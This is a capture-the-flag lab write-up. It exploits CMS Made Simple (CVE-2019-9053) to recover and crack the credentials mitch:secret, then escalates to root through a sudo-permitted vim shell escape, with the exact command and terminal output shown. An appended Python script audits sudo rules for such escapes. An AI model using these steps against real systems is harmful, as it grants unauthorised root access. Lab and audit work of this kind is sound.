Simple CTF
CMS Made Simple [CVE-2019-9053]
- Used Exploit: EDB-ID: 46635
- We were able to Brute-Force the Username:Password using the Automated Exploit.
- mitch : secret
[+] Salt for Password Found: 1dac0d92e9fa6bb2
[+] Username Found: mitch
[+] Email Found: admin@admin.com
[+] Password Found: 0c01f4468bd75d7a84c7eb73846e8d96
[+] Password Cracked: secret
Privilege Escalation
PORT - 2222
- Using SSH Credentials to Login: mitch:secret
mitch@Machine:~$ id
uid=1001(mitch) gid=1001(mitch) groups=1001(mitch)
- The User mitch can run: /usr/bin/vim as ROOT
- We can Escape into a Shell from vim by typing !sh or we can do that directly with sudo vim -c ':!/bin/sh'
mitch@Machine:~$ sudo -l
User mitch may run the following commands on Machine:
(root) NOPASSWD: /usr/bin/vim
mitch@Machine:~$ sudo /usr/bin/vim
root@Machine:~$ id
uid=0(root) gid=0(root) groups=0(root)
root@Machine:~$ whoami
root
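
A defensive check for the sudo rule shown above, added here as an example and not part of the original write-up: it parses `sudo -l` output and flags rules that let a user run an escape-capable program as root without the `NOEXEC` tag. The function name, the program list and every sample line other than the vim rule are assumptions constructed for illustration.

```python
import re

# Assumption: a short, non-exhaustive set of programs with built-in shell
# escapes; extend it for your environment.
ESCAPE_CAPABLE = {"vim", "vi", "view", "less", "more", "man", "ed", "awk", "find"}

ENTRY_RE = re.compile(r"^\s*\(([^)]*)\)\s*(.+)$")   # "(root) NOPASSWD: /usr/bin/vim"
TAG_RE = re.compile(r"^([A-Z_]+):\s*")               # "NOPASSWD: ", "NOEXEC: "

def audit_sudo_l(output):
    """Flag `sudo -l` rules that hand out a root shell through a program escape."""
    findings = []
    for line in output.splitlines():
        m = ENTRY_RE.match(line)
        if not m:
            continue  # header or blank line
        runas = m.group(1).split(":")[0].strip()
        if runas not in ("root", "ALL"):
            continue
        noexec = nopasswd = False
        for cmd in m.group(2).split(","):
            cmd = cmd.strip()
            # Tags prefix a command and carry over to the commands after it.
            while (t := TAG_RE.match(cmd)):
                if t.group(1) in ("EXEC", "NOEXEC"):
                    noexec = t.group(1) == "NOEXEC"
                if t.group(1) in ("PASSWD", "NOPASSWD"):
                    nopasswd = t.group(1) == "NOPASSWD"
                cmd = cmd[t.end():]
            if not cmd:
                continue
            binary = cmd.split()[0].rsplit("/", 1)[-1]
            if cmd == "ALL" or (binary in ESCAPE_CAPABLE and not noexec):
                findings.append({"runas": runas, "command": cmd, "nopasswd": nopasswd})
    return findings

# Constructed sample: the first rule is the one from the write-up, the rest are made up.
SAMPLE = """User mitch may run the following commands on Machine:
    (root) NOPASSWD: /usr/bin/vim
    (root) NOEXEC: /usr/bin/less, /bin/ls
    (root) sudoedit /etc/motd
"""

if __name__ == "__main__":
    for f in audit_sudo_l(SAMPLE):
        print("RISKY:", f)
```

Granting `sudoedit` on the specific files a user needs to change, instead of the editor binary itself, removes the finding for the vim rule.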